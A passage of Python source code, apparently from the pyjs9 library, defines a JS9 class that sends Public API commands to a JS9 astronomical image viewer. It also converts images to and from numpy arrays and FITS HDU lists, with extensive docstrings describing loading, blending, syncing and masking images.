raise ValueError('unknown retrieveAs type for GetImageData()')
return arr
class JS9:
"""
The JS9 class supports communication with an instance of JS9 in a web
page, utilizing the JS9 Public API calls as class methods.
JS9's public access library is documented here:
- http://js9.si.edu/js9/help/publicapi.html
In addition, a number of special methods are implemented to facilitate data
access to/from well-known Python objects:
- GetNumpy: retrieve a FITS image or an array into a numpy array
- SetNumpy: send a numpy array to JS9 for display
- GetFITS: retrieve a FITS image into an astropy (or pyfits) HDU list
- SetFITS: send a astropy (or pyfits) HDU list to JS9 for display
"""
def __init__(self, host='http://localhost:2718', id='JS9', maxtries=5, delay=1, debug=False): # pylint: disable=redefined-builtin, too-many-arguments
"""
:param host: host[:port] (def: 'http://localhost:2718')
:param id: the JS9 display id (def: 'JS9')
:rtype: JS9 object connected to a single instance of js9
The JS9() contructor takes its first argument to be the host (and
optional port) on which the back-end js9Helper is running. The default
is 'http://localhost:2718', which generally will be the correct value
for running locally. The default port (2718) will be added if no port
value is found. The string 'http://' will be prefixed to the host if a
URL protocol is not supplied. Thus, to connect to the main JS9 web
site, you can use host='js9.si.edu'.
The second argument is a JS9 display id on the web page. The
default is 'JS9' which is the default JS9 display id. Thus:
>>> JS9 = pyjs9.JS9()
is appropriate for local web pages having only one JS9 display.
"""
self.__dict__['id'] = id
# add default port, if necessary
c = host.rfind(':')
s = host.find('/')
if c <= s:
host += ':2718'
if s < 0:
host = 'http://' + host
self.__dict__['host'] = host
# open socket.io connection, if necessary
if js9Globals['transport'] == 'socketio':
try:
if debug:
self.sockio = socketio.Client(logger=True,
engineio_logger=True)
else:
self.sockio = socketio.Client()
self.sockio.connect(host)
except Exception as e: # pylint: disable=broad-except
logging.warning('socketio connect failed: %s, using html', e)
js9Globals['transport'] = 'html'
self._block_cb = None
# wait for connect be ready, but success doesn't really matter here
tries = 0
while tries < maxtries:
try:
self._alive()
except Exception: # pylint: disable=broad-except
time.sleep(delay)
tries = tries - 1
else:
break
def __setitem__(self, itemname, value):
"""
An internal routine to process some assignments specially
"""
self.__dict__[itemname] = value
if itemname in ('host', 'id',):
self._alive()
def _alive(self):
"""
An internal routine to send a test message to the helper
"""
self.send(None, msg='alive')
def sockioCB(self, *args):
"""
Internal routine
"""
logging.debug('socketio callback, args: %s', args)
self.__dict__['sockioResult'] = args[0]
self._block_cb.acquire()
self._block_cb.notify()
self._block_cb.release()
def send(self, obj, msg='msg'):
"""
:obj: dictionary containing command and args keys
:rtype: returned data or info (in format specified by public api)
examples:
>>> js9 = pyjs9.JS9()
>>> js9.send({'cmd': 'GetColormap'})
{u'bias': 0.5, u'colormap': u'cool', u'contrast': 1}
>>> js9.send({'cmd': 'SetColormap', 'args': ['red']})
'OK'
"""
if obj is None:
obj = {}
obj['id'] = self.__dict__['id']
if js9Globals['transport'] == 'html': # pylint: disable=no-else-return
host = self.__dict__['host']
try:
url = requests.post(host + '/' + msg, json=obj)
except IOError as e:
raise IOError('Cannot connect to {0}: {1}'.format(host, e))
urtn = url.text
if 'ERROR:' in urtn:
raise ValueError(urtn)
try:
# TODO: url.json() decode the json for us:
# http://www.python-requests.org/en/latest/user/quickstart/#json-response-content
# res = url.json()
res = json.loads(urtn, object_hook=_decode_dict)
except ValueError: # not json
res = urtn
if type(res) == str:
res = res.strip()
return res
else:
self.__dict__['sockioResult'] = ''
self._block_cb = Condition()
self._block_cb.acquire()
self.sockio.emit('msg', obj, callback=self.sockioCB)
self._block_cb.wait(timeout=js9Globals['wait'])
self._block_cb.release()
# self.sockio.wait_for_callbacks(seconds=js9Globals['wait'])
if self.__dict__['sockioResult'] and \
isinstance(self.__dict__['sockioResult'], str) and \
'ERROR:' in self.__dict__['sockioResult']:
raise ValueError(self.__dict__['sockioResult'])
return self.__dict__['sockioResult']
def close(self):
"""
Close the socketio connection and disconnect from the server
"""
if js9Globals['transport'] == 'socketio':
try:
self.sockio.disconnect()
except Exception as e: # pylint: disable=broad-except
logging.error('socketio close failed: %s', e)
if js9Globals['fits']:
def GetFITS(self):
"""
:rtype: fits hdulist
To read FITS data or a raw array from js9 into fits, use the
'GetFITS' method. It takes no args and returns an hdu list::
>>> hdul = j.GetFITS()
>>> hdul.info()
Filename: StringIO.StringIO
No. Name Type Cards Dimensions Format
0 PRIMARY PrimaryHDU 24 (1024, 1024) float32
>>> data = hdul[0].data
>>> data.shape
(1024, 1024)
"""
# get image data from JS9
im = self.GetImageData(js9Globals['retrieveAs'])
# if the image is too large, we can back get an empty string
if im == '':
raise ValueError('GetImageData failed: image too large for Python transport?')
# convert to numpy
arr = _im2np(im)
# add fits cards
# create FITS primary hdu from numpy array
hdu = fits.PrimaryHDU(arr)
hdulist = fits.HDUList([hdu])
return hdulist
def SetFITS(self, hdul, name=None):
"""
:param hdul: fits hdulist
:param name: fits file or object name (used as id)
After manipulating or otherwise modifying a fits hdulist (or
making a new one), you can display it in js9 using the 'SetFITS'
method, which takes the hdulist as its sole argument::
>>> j.SetFITS(nhdul)
Note that this routine creates a new image in the JS9 display. If
you want to update the current image, use RefreshImage. In that
case, the hdul's numpy array must be converted to a list:
>>>> j.RefreshImage(hdul[0].data.tolist())
"""
if not js9Globals['fits']:
raise ValueError('SetFITS not defined (fits not found)')
if not isinstance(hdul, fits.HDUList):
if js9Globals['fits'] == 1:
raise ValueError('requires astropy.HDUList as input')
raise ValueError('requires pyfits.HDUList as input')
# in-memory string
memstr = BytesIO()
# write fits to memory string
hdul.writeto(memstr, output_verify=js9Globals['output_verify'])
# get memory string as an encoded string
encstr = base64.b64encode(memstr.getvalue()).decode()
# set up JS9 options
opts = {}
if name:
opts['filename'] = name
# send encoded file to JS9 for display
got = self.Load(encstr, opts)
# finished with memory string
memstr.close()
return got
else:
@staticmethod
def GetFITS():
"""
This method is not defined because fits in not installed.
"""
raise ValueError('GetFITS not defined (astropy.io.fits not found)')
@staticmethod
def SetFITS():
"""
This method is not defined because fits in not installed.
"""
raise ValueError('SetFITS not defined (astropy.io.fits not found)')
if js9Globals['numpy']:
def GetNumpy(self):
"""
:rtype: numpy array
To read a FITS file or an array from js9 into a numpy array, use
the 'GetNumpy' method. It takes no arguments and returns the
np array::
>>> j.get('file')
'/home/eric/data/casa.fits[EVENTS]'
>>> arr = j.GetNumpy()
>>> arr.shape
(1024, 1024)
>>> arr.dtype
dtype('float32')
>>> arr.max()
51.0
"""
# get image data from JS9
im = self.GetImageData(js9Globals['retrieveAs'])
# if the image is too large, we can get back an empty string
if im == '':
raise ValueError('GetImageData failed: image too large for Python transport?')
# convert to numpy
arr = _im2np(im)
return arr
def SetNumpy(self, arr, filename=None, dtype=None):
"""
:param arr: numpy array
:param name: file or object name (used as id)
:param dtype: data type into which to convert array before sending
After manipulating or otherwise modifying a numpy array (or making
a new one), you can display it in js9 using the 'SetNumpy' method,
which takes the array as its first argument::
>>> j.SetNumpy(arr)
An optional second argument specifies a datatype into which the
array will be converted before being sent to js9. This is
important in the case where the array has datatype np.uint64,
which is not recognized by js9::
>>> j.SetNumpy(arru64)
...
ValueError: uint64 is unsupported by JS9 (or FITS)
>>> j.SetNumpy(arru64,dtype=np.float64)
Also note that np.int8 is sent to js9 as int16 data, np.uint32 is
sent as int64 data, and np.float16 is sent as float32 data.
Note that this routine creates a new image in the JS9 display. If
you want to update the current image, use RefreshImage. In that
case, the numpy array must be converted to a list:
>>>> j.RefreshImage(arr.tolist())
"""
if not isinstance(arr, numpy.ndarray):
raise ValueError('requires numpy.ndarray as input')
if dtype and dtype != arr.dtype:
narr = arr.astype(dtype)
else:
narr = _cvt2np(arr)
if not narr.flags['C_CONTIGUOUS']:
narr = numpy.ascontiguousarray(narr)
# parameters to pass back to JS9
bp = _np2bp(narr.dtype)
(h, w) = narr.shape
dmin = narr.min().tolist()
dmax = narr.max().tolist()
# base64-encode numpy array in native format
encarr = base64.b64encode(narr.tostring()).decode()
# create object to send to JS9 containing encoded array
hdu = {'naxis': 2, 'naxis1': w, 'naxis2': h, 'bitpix': bp,
'dmin': dmin, 'dmax': dmax, 'encoding': 'base64',
'image': encarr}
if filename:
hdu['filename'] = filename
# send encoded file to JS9 for display
return self.Load(hdu)
else:
@staticmethod
def GetNumpy():
"""
This method is not defined because numpy in not installed.
"""
raise ValueError('GetNumpy not defined (numpy not found)')
@staticmethod
def SetNumpy():
"""
This method is not defined because numpy in not installed.
"""
raise ValueError('SetNumpy not defined (numpy not found)')
def Load(self, *args):
"""
Load an image into JS9
call:
JS9.Load(url, opts)
where:
- url: url, fits object, or in-memory FITS
- opts: object containing image parameters
NB: In Python, you probably want to call JS9.SetFITS() or
JS9.SetNumpy() to load a local file into JS9.
Load a FITS file or a PNG representation file into JS9. Note that
a relative URL is relative to the JS9 install directory.
You also can pass an in-memory buffer containing a FITS file, or a
string containing a base64-encoded FITS file.
Finally, you can pass a fits object containing the following
properties:
- naxis: number of axes in the image
- axis: array of image dimensions for each axis or ...
- naxis[n] image dimensions of each axis (naxis1, naxis2, ...)
- bitpix: FITS bitpix value
- head: object containing header keywords as properties
- image: list containing image pixels
- dmin: data min (optional)
- dmax: data max (optional)
To override default image parameters, pass the image opts argument:
>>> j.Load('png/m13.png', {'scale':'linear', 'colormap':'sls'})
"""
return self.send({'cmd': 'Load', 'args': args})
def LoadWindow(self, *args):
"""
Load an image into a light window or a new (separate) window
call:
JS9.LoadWindow(url, opts, type, html, winopts)
where:
- url: remote URL image to load
- opts: object containing image parameters
- type: "light" or "new"
- html: html for the new page (def: menubar, image, colorbar)
- winopts: for "light", optional dhtml window options
returns:
- id: the id of the JS9 display div
This routine will load an image into a light-weight window or an
entirely new window. The url and opts arguments are identical to
the standard JS9.Load() call, except that opts can contain:
- id: string specifying the id of the JS9 display being created:
if no id is specified, a unique id is generated
- clone: the id of a display to clone when creating a light window:
the menubar and colorbar will be created if and only if they are
present in the cloned display
The type argument determines whether to create a light-weight
window ("light", the default) or a new separate window ("new").
You can use the html argument to supply different web page elements
for the window. Furthermore, if you create a light window, a default
set of DynamicDrive dhtmlwindow parameters will be used to make the
window the correct size for the default html:
"width=512px,height=542px,center=1,resize=1,scrolling=1"
You can supply your own parameters for the new dhtmlwindow using the
winOpts argument. See the Dynamic Drive web site:
http://www.dynamicdrive.com/dynamicindex8/dhtmlwindow/index.htm
for more information about their light-weight window.
To create a new light window without loading an image, use:
>>>> JS9.LoadWindow("", "", "light");
"""
return self.send({'cmd': 'LoadWindow', 'args': args})
def LoadProxy(self, *args):
"""
Load an FITS image link into JS9 using a proxy server
call:
JS9.LoadProxy(url, opts)
where:
- url: remote URL link to load
- opts: object containing image parameters
Load a FITS file specified by an arbitrary URL into JS9 using
the JS9 back-end helper as a proxy server. Not all back-end
servers support the proxy functionality. The main JS9 web
site does support proxy service, and can be used to view
images from arbitrary URLs.
The JS9.LoadProxy() call takes a URL as its first argument.
This URL will be retrieved using curl or wget and stored on the
back-end server in a directory specifically tied to the web page.
(The directory and its contents will be deleted when the page is
unloaded.) JS9 then will load the file from this directory.
Note that since the file resides on the back-end server, all
back-end analysis defined on that server is available.
To override default image parameters, pass the image opts argument:
>>> j.LoadProxy('http://hea-www.cfa.harvard.edu/~eric/coma.fits',
{'scale':'linear', 'colormap':'sls'})
If an onload callback function is specified in opts, it will be called
after the image is loaded:
>>> j.LoadProxy('http://hea-www.cfa.harvard.edu/~eric/coma.fits',
{'scale': 'linear', 'onload': func})
"""
return self.send({'cmd': 'LoadProxy', 'args': args})
def GetStatus(self, *args):
"""
Get Processing Status
call:
status = JS9.GetStatus(type, id)
where:
- type: the type of status
- id: the id of the file that was loaded into JS9
returns:
- status: status of the processing
This routine returns the status of one of the following specified
asynchronous processing types: "Load", "CreateMosaic",
"DisplaySection", "LoadCatalog", "LoadRegions", "ReprojectData",
"RotateData", "RunAnalysis".
A status of "complete" means that the image is fully processed. Other
statuses include:
- processing: the image is being processed
- loading: the image is in process of loading ("Load" only)
- error: image did not load due to an error
- other: another image is loaded into this display
- none: no image is loaded into this display
"""
return self.send({'cmd': 'GetStatus', 'args': args})
def GetLoadStatus(self, *args):
"""
Get Load Status
call:
status = JS9.GetLoadStatus(id)
where:
- id: the id of the file that was loaded into JS9
returns:
- status: status of the load
This routine returns the status of the load of this image.
Provided for backward compatibility, it simply calls the more general
GetStatus() routine with "Load" as the first argument.
A status of 'complete' means that the image is fully loaded. Other
statuses include:
- loading: the image is in process of loading
- error: image did not load due to an error
- other: another image is loaded into this display
- none: no image is loaded into this display
"""
return self.send({'cmd': 'GetLoadStatus', 'args': args})
def DisplayImage(self, *args):
"""
Display an image
call:
JS9.RefreshImage(step)
where:
- step: starting step to take when displaying the image
The display steps are: "colors" (remake colors when cmap has changed),
"scaled" (rescale data values), "primary" (convert scaled data values
to color values), and "display" (write color values to the web page).
The default step is "primary", which displays the image without
recalculating color data, scaled data, etc. This generally is what you
want, unless you have changed parameter(s) used in a prior step.
"""
return self.send({'cmd': 'DisplayImage', 'args': args})
def RefreshImage(self, *args):
"""
Re-read the image data and re-display
call:
JS9.RefreshImage(input)
where:
- input: python list
This routine can be used, for example, in laboratory settings where
data is being gathered in real-time and the JS9 display needs to be
refreshed periodically. The first input argument can be one of the
following:
- a list containing image pixels (for numpy, use tolist() to convert)
- a two-dimensional list containing image pixels
- a dictionary containing a required image property and any of the
following optional properties:
- naxis: number of axes in the image
- axis: array of image dimensions for each axis or ...
- naxis[n] image dimensions of each axis (naxis1, naxis2, ...)
- bitpix: FITS bitpix value
- head: object containing header keywords as properties
- dmin: data min (optional)
- dmax: data max (optional)
When passing an object as input, the required image property that
contains the image data can be a list or a list of lists containing
data. It also can contain a base64-encoded string containing a list.
This latter can be useful when calling JS9.RefreshImage() via HTTP.
Ordinarily, when refreshing an image, there is no need to specify the
optional axis, bitpix, or header properties. But note that you actually
can change these values on the fly, and JS9 will process the new data
correctly. Also, if you do not pass dmin or dmax, they will be
calculated by JS9.
Note that you can pass a complete FITS file to this routine. It will be
passed to the underlying FITS-handler before being displayed. Thus,
processing time is slightly greater than if you pass the image data
directly.
The main difference between JS9.RefreshImage() and JS9.Load() is
that the former updates the data into an existing image, while the
latter adds a completely new image to the display.
"""
return self.send({'cmd': 'RefreshImage', 'args': args})
def CloseImage(self, *args):
"""
Clear the image from the display and mark resources for release
call:
JS9.CloseImage()
Each loaded image claims a non-trivial amount of memory from a finite
amount of browser heap space. For example, the default 32-bit version
of Google Chrome has a memory limit of approximately 500Mb. If you are
finished viewing an image, closing it tells the browser that the
image's memory can be freed. In principle, this is can help reduce
overall memory usage as successive images are loaded and discarded.
Note, however, that closing an image only provides a hint to the
browser, since this sort of garbage collection is not directly
accessible to JavaScript programming.
Some day, all browsers will support full 64-bit addressing and this
problem will go away ...
"""
return self.send({'cmd': 'CloseImage', 'args': args})
def GetImageData(self, *args):
"""Get image data and auxiliary info for the specified image
call:
imdata = JS9.GetImageData(dflag)
where:
- dflag: specifies whether the data should also be returned
returns:
- imdata: image data object
NB: In Python, you probably want to call JS9.GetFITS() or
JS9.GetNumpy() to retrieve an image.
The image data object contains the following information:
- id: the id of the file that was loaded into JS9
- file: the file or URL that was loaded into JS9
- fits: the FITS file associated with this image
- source: 'fits' if a FITS file was downloaded, 'fits2png' if a
representation file was retrieved
- imtab: 'image' for FITS images and png files, 'table' for FITS
binary tables
- width: x dimension of image
- height: y dimension of image
- bitpix: FITS bits/pixel of each image element (8 for unsigned
char, 16, 32 for signed integer, -32 or -64 for float)
- header: object containing FITS header values
- data: buffer containing raw data values
This call can return raw data for subsequent use in local analysis
tasks. The format of the returned data depends on the exact value of
dflag. If dflag is the boolean value true, an HTML5 typed array
is returned, which translates into a dictionary of pixels values in
Python. While typed arrays are more efficient than ordinary JavaScript
arrays, this is almost certainly not what you want in Python.
If dflag is the string 'array', a Python list of pixel values is
returned. Intuitively, this would seem to what is wanted, but ... it
appears that base64-encoded strings are transferred more quickly
through the JS9 helper than are binary data.
If dflag is the string 'base64', a base64-encoded string is returned.
Oddly, this seems to be the fastest method of transferring
data via socket.io to an external process such as Python, and, in
fact, is the method used by the pyjs9 numpy and fits routines.
The file value can be a FITS file or a representation PNG file. The
fits value will be the path of the FITS file associated with this
image. For a presentation PNG file, the path generally will be relative
to the JS9 install directory. For a normal FITS file, the path usually
is an absolute path to the FITS file.
"""
return self.send({'cmd': 'GetImageData', 'args': args})
def GetDisplayData(self, *args):
"""
Get image data for all images loaded into the specified display
call:
imarr = JS9.GetDisplayData()
returns:
- imarr: array of image data objects
The JS9.GetDisplayData() routine returns an array of image data
objects, one for each images loaded into the specified display.
That is, it returns the same type of information as JS9.GetImageData(),
but does so for each image associated with the display, not just the
current image.
"""
return self.send({'cmd': 'GetDisplayData', 'args': args})
def DisplayPlugin(self, *args):
"""
Display plugin in a light window
call:
JS9.DisplayPlugin(plugin)
where:
- plugin: name of the plugin
Toggle the light-window display of the named plugin, as is done
by the View and Analysis menus. That is, if the plugin is not
visible, make it visible. If the plugin is visible, hide it.
You can supply the full class and plugin name or just the name, using
exact case or lower case, e.g.:
- JS9Panner or panner
- JS9Magnifier or magnifier
- JS9Info or info
- JS9Console or console
- DataSourcesArchivesCatalogs or archivescatalogs
- FitsBinning or binning
- ImExamEncEnergy or encenergy
- ImExamPxTabl or pxtabl
- ImExamRadialProj or radialproj
- ImExamHistogram or histogram
- ImExamRegionStats or regionstats
- ImExamXProj or xproj
- ImExamYProj or yproj
- ImExam3dPlot or 3dplot
- ImExamContours or contours
As with plugins in the View and Analysis menus, this routine does
nothing if the plugin is explicitly defined on the web page.
"""
return self.send({'cmd': 'DisplayPlugin', 'args': args})
def DisplayExtension(self, *args):
"""
Display an extension from a multi-extension FITS file
call:
JS9.DisplayExtension(extid, opts)
where:
- extid: HDU extension number or the HDU's EXTNAME value
- opts: object containing options
This routine allows you to display images and even binary
tables from a multi-extension FITS file. (See, for example,
http://fits.gsfc.nasa.gov/fits_primer.htmlthe FITS Primer
for information about HDUs and multi-extension FITS).
"""
return self.send({'cmd': 'DisplayExtension', 'args': args})
def DisplaySection(self, *args):
"""
Extract and display a section of a FITS file
call:
JS9.DisplaySection(opts)
where:
- opts: object containing options
This routine allows you to extract and display a section of FITS file.
The opts object contains properties specifying how to generate and
display the section:
- xcen: x center of the section in file (physical) coords (required)
- ycen: y center of the section in file (physical) coords (required)
- xdim: x dimension of section to extract before binning
- ydim: y dimension of section to extract before binning
- bin: bin factor to apply after extracting the section
- filter: for tables, row/event filter to apply when extracting a
section
- separate: if true, display as a separate image (def: to update
the current image)
All properties are optional: by default, the routine will extract a bin
1 image from the center of the file.
For example, if an image has dimensions 4096 x 4096, then specifying:
- center: 1024, 1024
- dimensions: 1024, 1024
- bin: 2
will bin the upper left 1024 x 1024 section of the image by 2 to
produce a 512 x 512 image. Note that 0,0 can be used to specify the
file center.
Table filtering allows you to select rows from an FITS binary table
(e.g., an X-ray event list) by checking each row against an expression
involving the columns in the table. When a table is filtered, only
valid rows satisfying these expressions are used to make the image.
A filter expression consists of an arithmetic or logical operation
involving one or more column values from a table. Columns can be
compared to other columns or to numeric constants. Standard JavaScript
math functions can be applied to columns. JavaScript (or C) semantics
are used when constructing expressions, with the usual precedence and
associativity rules holding sway:
Operator Associativity
-------- -------------
() left to right
! (bitwise not) - (unary minus) right to left
* / left to right
+ - left to right
< <= > >= left to right
== != left to right
& (bitwise and) left to right
^ (bitwise exclusive or) left to right
| (bitwise inclusive or) left to right
&& (logical and) left to right
|| (logical or) left to right
= right to left
For example, if energy and pha are columns in a table, then the
following are valid expressions:
pha > 1
energy == pha
pha > 1 && energy <= 2
max(pha,energy) >= 2.5
NB: JS9 uses cfitsio by default (you can, but should not, use the
deprecated fitsy.js), and therefore follows cfitsio filtering
conventions, which are documented in:
https://heasarc.gsfc.nasa.gov/docs/software/fitsio/c/c_user/node97.html
"""
return self.send({'cmd': 'DisplaySection', 'args': args})
def DisplaySlice(self, *args):
"""
Display a slice of a FITS data cube
call:
JS9.DisplaySlice(slice, opts)
where:
- slice: slice description or slice number
- opts: object containing options
This routine allows you to display a 2D slice of a 3D or 4D
FITS data cube, i.e. a FITS image containing 3 or 4 axes.
The slice parameter can either be the numeric value of the
slice in the third (or fourth) image dimension (starting
with 1) or it can be a slice description string: a combination
of asterisks and a numeric value defines the slice axis. Thus, for
example, in a 1024 x 1024 x 16 cube, you can display the sixth slice
along the third axis in one of two ways:
>>> JS9.DisplaySlice(6)
or:
>>> JS9.DisplaySlice("*,*,6")
If the image was organized as 16 x 1024 x 1024, you would use the
string description:
>>> JS9.DisplaySlice("6,*,*")
By default, the new slice replaces the data in the currently displayed
image. You can display the slice as a separate image by supplying
an opts object with its separate property set to true.
For example:
>>> JS9.DisplaySlice("6,*,*", {separate: true})
will display the sixth slice of the first image dimension separately
from the original file, allowing blinking, image blending, etc. between
the two "files". Note that the new id and filename are adjusted to be
the original file's values with the cfitsio image section [6:6,*,*]
appended.
"""
return self.send({'cmd': 'DisplaySlice', 'args': args})
def MoveToDisplay(self, *args):
"""
Move an image to a new JS9 display
call:
JS9.MoveToDisplay(dname)
where:
- dname: name of JS9 display to which the current image will be moved
The JS9.MoveToDisplay() routine moves the current image to the
specified display:
>>> JS9.MoveToDisplay("myJS9")
will move the current image displayed in the "JS9" display window to
the "myJS9" window.
Note that the new JS9 display must already exist. New displays can be
created with the JS9.LoadWindow() public access routine or
the File:new JS9 light window menu option.
"""
return self.send({'cmd': 'MoveToDisplay', 'args': args})
def BlendImage(self, *args):
"""
Blend the image in an image stack using W3C composite/blend modes
call:
JS9.BlendImage(blendMode, opacity)
calling sequences:
JS9.BlendImage() # return current blend params
JS9.BlendImage(true||false) # turn on/off blending
JS9.BlendImage(mode, opacity) # set blend mode and/or opacity
where:
- mode: one of the W3C bend modes
- opacity: the opacity of the blended image (percent from 0 to 1)
Image processing programs such as Adobe Photoshop and Gimp allow you
to blend a stack of images together by mixing the RGB colors. The W3C
has defined a number of composite and blending modes which have been
implemented by Firefox, Chrome, and Safari (what about IE?):
- normal
- multiply
- screen
- overlay
- darken
- lighten
- color-dodge
- color-burn
- hard-light
- soft-light
- difference
- exclusion
- hue
- saturation
- color
- luminosity
In addition, the following Porter-Duff compositing modes are available
(though its unclear how useful they are in JS9 image processing):
- clear
- copy
- source-over
- destination-over
- source-in
- destination-in
- source-out
- destination-out
- source-atop
- destination-atop
- xor
- lighter
Blending and compositing modes are described in detail in:
https://www.w3.org/TR/compositing-1
https://developer.mozilla.org/en-US/docs/Web/API/Canvas_API/Tutorial/Compositing
JS9 allows you to use these modes to blend images together. If
you load two images of the same object into JS9, you can use
the JS9.ReprojectData() routine to align them by WCS. You then
can blend one image into the other by specifying a blend mode
and an optional opacity. For example, if chandra.fits and
spitzer.fits are two aligned images of the same object, and
chandra.fits is currently being displayed, you can blend
spitzer into chandra using the "screen" blend and opacity 0.9
mode this way:
>>> JS9.BlendImage("screen", 0.9)
After the spitzer image is blended, both images will be
displayed as part of the chandra.fits display. However,
changing the colormap, scale, contrast, or bias will only
affect the current chandra image, not the blended spitzer
part. In this way, you can continue to manipulate the current
image and the image blending will update automatically.
Also note that the spitzer image is still available separately
for display and manipulation. You can switch to displaying
spitzer and change colormap, scale, bias, contrast, etc. But
since the images are now blended, changes to spitzer will be
reflected in the spitzer part of the blended chandra
display. Thus, if you change the colormap on the display of
spitzer, and change back to chandra, the blended chandra image
will utilize the new colormap.
This linkage is maintained during zoom and pan operations. If
you display the blended chandra image and then zoom or pan it,
both images will be updated correctly to maintain
alignment. But note that this means when you go back to the
spitzer display, its zoom and/or pan values will have been
updated. In this way, the spitzer image always is correctly
linked to the blended version.
The JS9.BlendImage() call accepts a variable number of
arguments to perform a variety of functions:
JS9.BlendImage() returns an object containing the following properties:
- active: boolean specifying whether this image is to be blended
- mode: string specifying the blend mode
- opacity: opacity value (0 to 1)
>>> JS9.BlendImage() # returns a blend object for the current image
>>> JS9.BlendImage(true||false) # turns on/off blending of
>>> JS9.BlendImage(blend, opacity) # set/modify blend mode or opacity
"""
return self.send({'cmd': 'BlendImage', 'args': args})
def SyncImages(self, *args):
"""
Synchronize operations between two or more images
call:
JS9.SyncImages([ops], [images], [opts]) # set up synchronization
JS9.SyncImages(true||false) # turn on/off synchronization
where:
- ops: array of operations on which to sync
- images: array of images to sync with this image
- opts: options for sync'ing
Synchronize two or more images, so that when an operation is performed
on one image, it also is performed on the other(s). For example, when
the colormap or scale is changed on an image, it also is changed on
the sync'ed images. Or, when a region is created, moved, resized, or
removed on an image, the same happens on the sync'ed images.
When the SyncImages() call is invoked, the current image is
configured to synchronize the specified images. In addition, if
the reciprocate property is set in the opts object (see below),
the other images are also configured to synchronize one another (as
well as the current image). Once configuration is complete, a sync
command is executed immediately. If the current image already
displays one or more regions, these will be created in the target
images.
The operations that can be specified for sync'ing are:
"colormap", "pan", "regions", "scale", "wcs", "zoom", "contrastbias".
If no array is specified, the default array in JS9.globalOpts.syncOps
is used.
Images to synchronize can be specified as an array of image handles or
image ids. If no array is specified, all currently displayed images
are sync'ed.
The optional opts object can contain:
- reciprocate: boolean determining whether images sync one another
- reverse: boolean to reverse this image and target images (def: false)
If the opts object is not specified, the default value of
reciprocate is the value of the JS9.globalOpts.syncReciprocate
property.
Examples:
>>> # the current image will sync all operations for all images
>>> # sync reciprocally, so that changing any image syncs the others
>>> SyncImages()
>>> # current image will sync specified ops for foo1.fits,foo2.fits:
>>> SyncImages(["scale", "colormap"], ["foo1.fits", "foo2.fits"])
>>> # the current image will sync two images with default ops,
>>> # but the two images themselves will not sync images reciprocally
>>> SyncImages(null, ["foo1.fits", "foo2.fits"], {reciprocate: false});
Note that if the pan operation syncs two images having differently
sized fields of view, the smaller image will stop panning when it
reaches its edge, rather than displaying a blank field.
You can turn on/off syncing for a given image by specifying a single
boolean argument:
>>> # turn off sync'ing temporarily
>>> SyncImages(false);
This is different from unsync'ing in that you can turn sync'ing back
on without having to re-sync the images.
"""
return self.send({'cmd': 'SyncImages', 'args': args})
def UnsyncImages(self, *args):
"""
Unsynchronize two or more previously synchronized images
call:
JS9.UnsyncImages([ops], [images], [opts]) # clear synchronization
where:
- ops: array of operations to unsync
- images: array of images to unsync with this image
- opts: options for unsync'ing
Unsynchronize previously sync'ed images.
The operations that can be specified for unsync'ing are:
"colormap", "pan", "regions", "scale", "wcs", "zoom", "contrastbias".
If no array is specified, the default array in JS9.globalOpts.syncOps is
used. Thus, you can turn off sync'ing for specified operations, while
leaving others to be sync'ed.
Images to be unsync'ed can be specified as an array of image handles or
image ids. If no array is specified, all currently displayed images
are unsync'ed.
The optional opts object can contain:
- reciprocate: boolean determining whether images sync one another
- reverse: boolean to reverse this image and target images (def: false)
If the opts object is not specified, the default is to reciprocate based
on the value of the JS9.globalOpts.syncReciprocate property.
Examples:
>>> # this image won't sync on scale for foo1.fits and foo2.fits,
>>> # and they also will stop sync'ing
UnsyncImages(["scale"], ["foo1.fits", "foo2.fits"])
>>> # this image will still sync foo1.fits and foo2.fits, but
>>> # foo1.fits and foo2.fits will no longer sync this image:
UnsyncImages(null, ["foo1.fits", "foo2.fits"],
{reverse: true, reciprocal: false})
"""
return self.send({'cmd': 'UnsyncImages', 'args': args})
def MaskImage(self, *args):
"""
Mask an image using values in another image
call:
JS9.MaskImage(image, opts)
calling sequences:
JS9.MaskImage() # return current mask params
JS9.MaskImage(true||false) # turn on/off masking
JS9.MaskImage(image, opts) # set mask and optionally, its params
JS9.MaskImage(opts) # set mask params
where:
- image: image handle or image id to use as a mask
- opts: optional mask properties
and where the mask properties are:
- mode: "mask", "opacity", or "overlay"
- value: mask value that triggers masking (def: 0) for "mask" mode
- invert: whether to invert the mask (def: false) for "mask" mode
- def: object containing default RGBA values for "overlay" mode
- opacity: opacity when masking (def: 0, range 0 to 1) for both mode
The pixel values in one image can be used to mask the pixels in
another image if the two images have the same image dimensions.
The type of masking depends on the mode: "overlay" (default) or "mask".
For "mask" mode, if the value of a pixel in the mask is less than or
equal to the value property, the opacity of the displayed pixel
is set to the opacity property. You can also invert the mask
using the invert property. In effect, this mode displays only
the image pixels "covered" by a mask.
For "opacity" mode, each image pixel is assigned an opacity equal
to the value of the mask pixel (whose values are assumed to range
from 0 to 1.)
For "overlay" mode, if the mask pixel has a non-zero alpha, its color
is blended with the image pixel using source-atop composition.
Otherwise, the image pixel color alone is used in the display.
This is one way you can display a mask overlay on top of an image.
A static colormap is usually used in conjunction with an overlay
mask, since pixel values not explicitly assigned a color are
transparent. Note that, when blending a mask and image pixel, the
global mask opacity and the individual pixel opacity are multiplied to
get the final pixel opacity.
To set up a mask initially, call the routine with an already-loaded
mask image as the first parameter, and an optional opts object as the
second parameter:
>>> # default is "overlay"
>>> JS9.ImageMask("casa_mask.fits");
>>> JS9.ImageMask("casa_mask.fits", {mode: "overlay"});
>>> # "mask" mode: set lower threshold for masking and masked opacity
>>> JS9.ImageMask("mask.fits",{"mode":"mask","value":5,"opacity":0.2});
You can change the mask parameters at any time:
>>> JS9.ImageMask({value: 2, opacity: 0});
or temporarily turn off and on the mask:
>>> JS9.ImageMask(false);
>>> ...
>>> JS9.ImageMask(true);
"""
return self.send({'cmd': 'MaskImage', 'args': args})
def BlendDisplay(self, *args):
"""
Set global blend mode for specified display
call:
mode = JS9.BlendDisplay(True|False)
returns:
- mode: current image blend mode
This routine will turn on/off the global image blend mode for the
specified display. If no argument is specified, it returns the current
blend mode.
"""
return self.send({'cmd': 'BlendDisplay', 'args': args})
def GetColormap(self, *args):
"""
Get the image colormap
call:
cmap = JS9.GetColormap()
returns:
- cmap: an object containing colormap information.
The returned cmap object will contain the following properties:
- colormap: colormap name
- contrast: contrast value (range: 0 to 10)
- bias: bias value (range 0 to 1)
"""
return self.send({'cmd': 'GetColormap', 'args': args})
def SetColormap(self, *args):
"""
Set the image colormap
